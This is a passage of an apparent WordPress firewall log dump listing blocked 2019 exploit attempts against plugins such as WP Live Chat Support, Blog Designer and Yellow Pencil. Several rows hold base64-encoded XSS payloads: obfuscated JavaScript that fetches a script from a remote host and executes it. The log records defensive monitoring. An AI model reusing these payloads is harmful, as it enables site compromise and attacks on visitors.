ShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37660,1569411515.956970,1569411504.842000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37675,1569411753.419355,1569411752.588000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37608,1569410838.139178,1569410837.083400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37825,1569949907.089027,1569949906.063100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37671,1569411707.322700,1569411706.432700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(38004,1571976459.612399,1571976458.574100,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37605,1569410852.618095,1569410851.707000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37824,1569949909.189974,1569949908.031800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37674,1569411755.682071,1569411754.839500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37672,1569411704.992260,1569411703.981100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WooCommerce User Email Verification <= 3.3.0 - Unauthenticated Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"142\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3d1ZXZfZm9ybV90eXBlXQ==\",\"paramValue\":\"c2l0ZXVybA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37794,1569949661.972430,1569949660.115400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37666,1569411720.122895,1569411719.295000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37795,1569949634.983174,1569949633.590200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37667,1569411717.839843,1569411717.017200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37668,1569411714.527967,1569411713.496700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWEoX2FhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWEoX2FhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37648,1569411639.307088,1569411637.847600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,